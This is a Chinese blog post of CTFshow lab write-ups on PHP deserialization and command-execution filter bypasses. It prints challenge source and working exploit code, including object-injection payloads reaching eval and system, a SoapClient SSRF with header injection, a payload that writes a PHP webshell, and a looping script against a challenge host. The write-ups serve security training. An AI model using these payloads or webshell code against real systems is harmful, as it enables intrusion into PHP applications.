CTFshow web入门反序列化

最新推荐文章于 2024-04-28 14:27:57 发布

jsjsj11123

最新推荐文章于 2024-04-28 14:27:57 发布

阅读量949

点赞数

分类专栏： CTF web 文章标签： web安全

本文链接：https://blog.csdn.net/qq_39948058/article/details/120600864

版权

CTF 同时被 2 个专栏收录

32 篇文章 2 订阅

订阅专栏

web

3 篇文章 0 订阅

订阅专栏

前言：假期期间刷刷CTFweb方向的题吧，毕竟之前也是做实战渗透的

web254：经过代码审计，这个题逻辑不是很乱，就是if之间的相等，等于它设置的变量就可以了

?username=xxxxxx&password=xxxxxx
web255：这个题正式进入反序列化了，源代码如下（具体分析也在代码中了）：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;

public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
echo "your flag is ".$flag;
}else{
echo "no vip, no flag";
}
}
}

$username=$_GET['username']; //接受了username和password传参，所以这两个传参是必不可少的
$password=$_GET['password'];

if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']); // 有unserialize可以确定是反序列化题，。其中是cookie传参
if($user->login($username,$password)){ //传到了login，和它的变量相等就可以了
if($user->checkVip()){ //检测一下是不是vip,是的话vip就为ture，上面变量看出是false。我们把这个变量改下反序列化出来就可以了
$user->vipOneKeyGetFlag(); //得出flag
}
}else{
echo "no vip,no flag";
}
}
得出exp：

<?php
class ctfShowUser{
   public $username='xxxxxxx';
   public $password='xxxxxxx';
   public $isVip=true; //false=>true
}
$a=serialize(new ctfShowUser());
echo urlencode($a);
?>
接下来抓个包。改下cookie为这个exp出的语句，再在get上添加username和password传参就可以了

web256跟web255一样的题，用上面exp就能出

web257：此题有个后们，具体看代码分析：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
private $username='xxxxxx';
private $password='xxxxxx';
private $isVip=false;
private $class = 'info';

public function __construct(){
$this->class=new info(); //这里可以篡改到后门
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function __destruct(){
$this->class->getInfo(); //这里也可以篡改到后门
}

}

class info{
private $user='xxxxxx';
public function getInfo(){
return $this->user;
}
}

class backDoor{
private $code;
public function getInfo(){
eval($this->code); //一个后门是代码执行eval函数，确定可以远程rce
}
}

$username=$_GET['username'];//接受username和password传参
$password=$_GET['password'];

if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']); //接受cookie的user传参
$user->login($username,$password); //检测是不是和变量相等
}
其实反序列化漏洞最能依靠魔法函数拉。__construct：用于对象创建，也就是new。__destruct：用于对象创建后释放，这样我们可以在这两个后面进行篡改一下，new到别的函数即可，也就是我们的后门函数
exp：

<?php
class ctfShowUser{
   private $username='xxxxxx';
   private $password='xxxxxx';
   public function __construct(){
       $this->class=new backDoor();
   }
   public function __destruct(){
       $this->class->getInfo();
   }
}
class backDoor{
   private $code="system('cat f*');";
   public function getInfo(){
       eval($this->code);
   }
}
$a = serialize(new ctfShowUser());
echo urlencode($a);
?>
还有一点是private是私有变量，不能随意篡改的

web258 具体代码分析：

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){ //在上一题的基础上加了一个正则表达式，我们可以用public绕过，。具体原因我也不知道，应该是php特性
$user = unserialize($_COOKIE['user']);
}
$user->login($username,$password);
}
exp:

<?php
class ctfShowUser{
   public $class;//都改为了public
   public function __construct(){
       $this->class=new backDoor();
   }
}
class backDoor{
   public $code='system("cat f*");';
}
$b=new ctfShowUser();
echo urlencode(serialize($b));

web259 原生类反序列化代码分析：

<?php

highlight_file(__FILE__);


$vip = unserialize($_GET['vip']);
//vip can get flag one key
$vip->getFlag();
通过审计，发现没有其类，百度一下别的师傅wp，发现这是个新的反序列化题目原生类序列化，根据题目的提示跟出了flag。php文件：
flag.php

<?php
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);


if($ip!=='127.0.0.1'){
   die('error');
}else{
   $token = $_POST['token'];
   if($token=='ctfshow'){
       file_put_contents('flag.txt',$flag);
   }
}

通过提示的flag代码，我们要加一个token，出现了http_x_forwarded_for传参，所以想了想是不是改下头就可以了，看着大佬的博客显然不行，所以要利用原生序列化，y4师傅的一篇文章描述的好详细，有时间阅读一下https://y4tacker.blog.csdn.net/article/details/113588692

综述：
php在安装php-soap拓展后，可以反序列化原生类SoapClient，来发送http post请求。
必须调用SoapClient不存在的方法，触发SoapClient的__call魔术方法。
通过CRLF来添加请求体：SoapClient可以指定请求的user-agent头，通过添加换行符的形式来加入其他请求内容
SoapClient采用了HTTP作为底层通讯协议，XML作为数据传送的格式，其采用了SOAP协议(SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息)，其次我们知道某个实例化的类，如果去调用了一个不存在的函数，会去调用__call方法，具体详细的信息大家可以去搜索引擎看看，这里不再赘述
exp：

<?php

$a = new SoapClient(null,
array(
'user_agent' => "feng\r\nx-forwarded-for:127.0.0.1,127.0.0.1\r\nContent-type:application/x-www-form-urlencoded\r\nContent-length:13\r\n\r\ntoken=ctfshow",
'uri' => 'feng',
'location' => 'http://127.0.0.1/flag.php'
)
);
$b = serialize($a);
#$c = unserialize($b);
#$c->not_a_function();//调用不存在的方法，让SoapClient调用__call
echo urlencode($b);

访问flag.txt即可
web260 代码分析：

<?php

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){ //一个包含关系，。包含就可以了
echo $flag;
}
exp：

?ctfshow=s:18:"ctfshow_i_love_36D";

web261 大佬都没做更何况我这种菜鸡纳

web262 字符串逃逸一个主代码和一个message.php代码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 02:37:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
setcookie('msg',base64_encode($umsg));
echo 'Your message has been sent';
}

highlight_file(__FILE__);
message.php：

if(isset($_COOKIE['msg'])){
$msg = unserialize(base64_decode($_COOKIE['msg']));
if($msg->token=='admin'){
echo $flag;
}
}

通过这个message看出我们需要进行吃掉一部分，也就是反序列化字符逃逸的情况，y4师傅这篇文章也有介绍，https://y4tacker.blog.csdn.net/article/details/113588692，就是把反序列化后的字符串给吃掉
由于token=admin才可以读取flag，。所以我吃掉：";s:5:"token";s:4:"user";} 这一行序列化后的代码就可以了。吃掉的话要依靠str_replace这个函数，根据手指头算出长度为26.所以我们要替换长度26个单词就可以了，用代码自身的话就是26个fuck就能吃掉token=user序列化后的
具体脚本：

<?php
class message{
public $from="1";
public $msg="1";
public $to='fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';

public $token='user';
}
$a=new message();
$b=serialize($a);
echo $b."<br><br>";
$b=str_replace('fuck', 'loveU', $b);
echo $b;

web263 session反序列化，本题没给代码。目录扫下。扫到了www.zip,下载下来（听说国赛出了个跟这个一样的题，几乎没有变）
看下check.php

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 16:59:10
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-06 19:15:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
require_once 'inc/inc.php';
$GET = array("u"=>$_GET['u'],"pass"=>$_GET['pass']);


if($GET){

   $data= $db->get('admin',
   [   'id',
       'UserName0'
   ],[
       "AND"=>[
       "UserName0[=]"=>$GET['u'],
       "PassWord1[=]"=>$GET['pass'] //密码必须为128位大小写字母+数字+特殊符号，防止爆破
       ]
   ]);
   if($data['id']){
       //登陆成功取消次数累计
       $_SESSION['limit']= 0;
       echo json_encode(array("success","msg"=>"欢迎您".$data['UserName0']));
   }else{
       //登陆失败累计次数加1
       $_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit'])+1);
       echo json_encode(array("error","msg"=>"登陆失败"));
   }
}

经过审计没啥，就是防护一下，看到了一个文件包含require_once 'inc/inc.php';，继续看inc.php

<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('session.serialize_handler', 'php');//表明使用的是php引擎，5.5.4前默认是php；5.5.4后改为php_serialize
//php_binary 键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值

//php: 键名+竖线（|）+经过serialize()函数处理过的值

//php_serialize: 经过serialize()函数处理过的值，会将键名和值当作一个数组序列化
date_default_timezone_set("Asia/Shanghai");
session_start(); //开启了session
use \CTFSHOW\CTFSHOW;
require_once 'CTFSHOW.php';
$db = new CTFSHOW([
'database_type' => 'mysql',
'database_name' => 'web',
'server' => 'localhost',
'username' => 'root',
'password' => 'root',
'charset' => 'utf8',
'port' => 3306,
'prefix' => '',
'option' => [
PDO::ATTR_CASE => PDO::CASE_NATURAL
]
]);

// sql注入检查
function checkForm($str){
if(!isset($str)){
return true;
}else{
return preg_match("/select|update|drop|union|and|or|ascii|if|sys|substr|sleep|from|where|0x|hex|bin|char|file|ord|limit|by|\`|\~|\!|\@|\#|\\$|\%|\^|\\|\&|\*|$|$|\（|\）|\+|\=|\[|\]|\;|\:|\'|\"|\<|\,|\>|\?/i",$str);
}
}


class User{
public $username;
public $password;
public $status;
function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function setStatus($s){
$this->status=$s;
}
function __destruct(){
file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s')); //这里在魔法函数使用了file_put_contents函数，危险点，可以直接写入
}
}

/*生成唯一标志
*标准的UUID格式为：xxxxxxxx-xxxx-xxxx-xxxxxx-xxxxxxxxxx(8-4-4-4-12)
*/

function uuid()
{
$chars = md5(uniqid(mt_rand(), true));
$uuid = substr ( $chars, 0, 8 ) . '-'
. substr ( $chars, 8, 4 ) . '-'
. substr ( $chars, 12, 4 ) . '-'
. substr ( $chars, 16, 4 ) . '-'
. substr ( $chars, 20, 12 );
return $uuid ;
}
index。php：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 16:28:37
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-06 19:21:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
   error_reporting(0);
   session_start();
   //超过5次禁止登陆
   if(isset($_SESSION['limit'])){
       $_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']); ；//cookie传参把写的exp运行后的结果写到
       $_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
   }else{
       setcookie("limit",base64_encode('1'));
       $_SESSION['limit']= 1;
   }

?>
生成脚本exp：

<?php
class User{
   public $ussername;
   public $password;
   public $status='a';
}
$a = new User();
$a->username='b.php';
$a->password='<?php eval($_REQUEST['maxbos44k']);?>';
echo base64_encode('|'.serialize($a)); //因为它用的ini_set('session.serialize_handler', 'php'),所以要加一个|。。php的特性
web264 字符串逃逸，跟上一个逃逸差不多：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 02:37:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
session_start();

class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
$_SESSION['msg']=base64_encode($umsg);
echo 'Your message has been sent';
}

highlight_file(__FILE__);

这题跟上一个字符串逃逸一样
直接exp：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
public $token;
public $password;

public function __construct($t,$p){
$this->token=$t;
$this->password = $p;
}
public function login(){
return $this->token===$this->password;
}
}

$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand()); //这里有个问题，就是mt_rand()是随机数再经过md5加密，这里要想让他们相等就有点难，不过这时候可以用到&取地址运算符，双向篡改就可以了，

if($ctfshow->login()){
echo $flag;
}
exp：

<?php
class ctfShowAdmin{
   public $token;
   public $password;
   public function __construct(){
       $this->token='a';
       $this->password=&$this->token; //这里直接取地址就是两个都能相等了，就能绕过去了
   }
}
$a = new ctfShowAdmin;
$b = serialize($a);
echo $b;?>
web266 正则大小写绕过，代码分析：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function login(){
return $this->username===$this->password;
}
public function __toString(){
return $this->username;
}
public function __destruct(){ //魔改函数结束时自动开启
global $flag;
echo $flag;
}
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){ //有正则，可以用大写绕过
throw new Exception("Error $ctfshowo",1);
}
exp：

<?php
class ctfshow{
}
echo serialize(new ctfshow());?>
web122:

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){
$code=$_POST['code'];
if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|PWD|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|$|$|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|#|%|\>|\'|\"|\`|\||\,/', $code)){
if(strlen($code)>65){
echo '<div align="center">'.'you are so long , I dont like '.'</div>';
}
else{
echo '<div align="center">'.system($code).'</div>';
}
}
else{
echo '<div align="center">evil input</div>';
}
}

?>
把pwd和#给过滤了，这次我们换另一个命令/bin/base64，这次放开了HOME，我们就用HOME来获取/，数字1的话我们没法使用${##}了，这里使用$?
**$? 最后运行的命令的结束代码（返回值）即执行上一个指令的返回值 (显示最后命令的退出状态。0表示没有错误，其他任何值表明有错误)**
利用<A的报错就能返回值1，根据题目fuzz提示，后面的base64中的4我们可以利用${RANDOM}来获得(因为具有随机性，所以要多尝试直到随机出4来)
exp：code=<A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???
写个脚本：

import requests

url = "http://3f405f9a-8ca5-4519-aef8-95943df5d5de.chall.ctf.show:8080/"
data = {'code': r'<A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???'}
while True:
result = requests.post(url=url, data=data)
if "PD9waHA" in result.text:
print(result.text)
break
web124：

error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
//例子 c=20-1
$content = $_GET['c'];
if (strlen($content) >= 80) {
die("太长了不会算");
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("请不要输入奇奇怪怪的字符");
}
}
//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("请不要输入奇奇怪怪的函数");
}
}
//帮你算出答案
eval('echo '.$content.';');
}
设置了黑名单白名单过滤，根据提示用到了两个数学函数来进行进制转换绕过

因为会匹配字母需要使用base_convert来进行绕过
echo base_convert('system',36,10);
//得到1751504350，从36进制转换到10进制，36进制包含10个数字和26个字母

echo base_convert('getallheaders',30,10);
//得到8768397090111664438，这里不使用36进制是因为精度会丢失，尝试到30的时候成功
exp：get:?c=$pi=base_convert,$pi(1751504350,10,36)($pi(8768397090111664438,10,30)(){1})
post：1:cat flag.php
总结：学到了命令执行代码执行各种绕过方法

jsjsj11123

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
CTFshow web入门反序列化

前言：假期期间刷刷CTFweb方向的题吧，毕竟之前也是做实战渗透的web254：经过代码审计，这个题逻辑不是很乱，就是if之间的相等，等于它设置的变量就可以了 ?username=xxxxxx&password=xxxxxxweb255：这个题正式进入反序列化了，源代码如下（具体分析也在代码中了）： <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: ...
复制链接

扫一扫